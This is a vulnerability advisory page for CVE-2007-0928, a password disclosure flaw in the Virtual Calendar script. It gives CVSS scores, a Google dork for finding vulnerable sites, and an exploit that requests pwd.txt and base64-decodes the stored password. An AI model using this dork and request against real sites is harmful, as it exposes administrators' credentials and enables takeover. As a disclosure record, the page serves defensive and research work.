Bug: Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability ( Ascii Version )

Search:
WLB2

Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability

Published
Credit
Risk
2007.02.15
BorN To K!LL
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-0928
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Virtual Calendar <= (pwd.txt) Remote Password Disclosur Vulnerability

Script: Virtual Calendar

DorK: "intitle:Virtual intitle:Calendar intitle:Demo"

URL:
http://www.scriptsez.net/download/download.php?action=download&p=vcalend
ar.zip&ns=1

Discovered by: BorN To K!LL

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

ExploiT:
~~~~~
www.site.com/[path]/pwd.txt

as we C .... crack the password with bass64 decode ....

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

GreeTz 2 :.
Dr.2 , AsbMay , General C , ToOoFa , str0ke , SHiKaA ,
ThE-LoRd-Of-CrAcKiNg ...

AsbMay's Group & KuW-SeC TeaM & Dm3R7 TeaM .....

Thanks a lot 2 www.milw0rm.com ......

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version